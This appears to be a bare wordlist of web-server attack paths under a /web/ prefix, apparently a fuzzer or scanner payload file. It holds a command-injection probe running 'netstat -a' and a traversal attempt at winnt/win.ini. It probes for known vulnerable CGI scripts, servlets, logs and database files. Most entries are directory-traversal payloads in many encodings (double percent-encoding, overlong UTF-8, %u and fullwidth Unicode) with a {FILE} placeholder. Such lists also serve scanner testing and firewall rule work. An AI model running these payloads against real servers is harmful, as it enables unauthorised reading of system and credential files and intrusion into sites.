/web/\nnetstat%20-a%\n/
/web/&,/web/&,/web/..%%35c/
/web////
/web/.meta/,/web/index.html/,/web/access_log/
/web/httpd.pid/,/web/icons/,/web/.web/
/web/status/,/web/htdocs/,/web/test-cgi/
/web/server-info/,/web/error/,/web/tmp/
/web/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini/
/web/scripts/dnewsweb.exe/,/web/scripts/fpcount.exe/,/web/scripts/samples/,/web/scripts/tools/ctss.idc/,/web/search/SQLQHit.asp/,/web/search97cgi/s97_cgi/,/web/secure/.wwwacl/,/web/servlet/SchedulerTransfer/,/web/servlet/com.unify.servletexec.UploadServlet/,/web/servlet/webacc?User.html=noexist/,/web/setup.nsf/,/web/signon/,/web/shoponline/fpdb/shop.mdb/,/web/surf/scwebusers/,/web/stronghold-info/,/web/useraction.php3/
/web/..%252f..%252f..%252f..%252f{FILE}/,/web/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}/,/web/..%c0%af..%c0%af..%c0%af{FILE}/,/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}/,/web/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}/,/web/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}/,/web/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}/,/web/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}/,/web/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}/,/web/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}/,/web/..%255c..%255c..%255c..%255c..%255c{FILE}/,/web/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}/,/web/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}/,/web/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}/,/web/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}/,/web/%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}/,/web/..%%32%66{FILE}/
/web/..%%32%66..%%32%66..%%32%66{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/..%%35%63{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}/
/web/..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/%%32%65%%32%65/{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63{FILE}/
/web/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}/
/web/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}/
/web/..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}/
/web/..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}/
/web/..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216..%u2216{FILE}/
/web/..%u2216{FILE}/
/web/..%u2216..%u2216..%u2216{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/%uff0e%uff0e\{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}/
/web/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
/web/%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}/
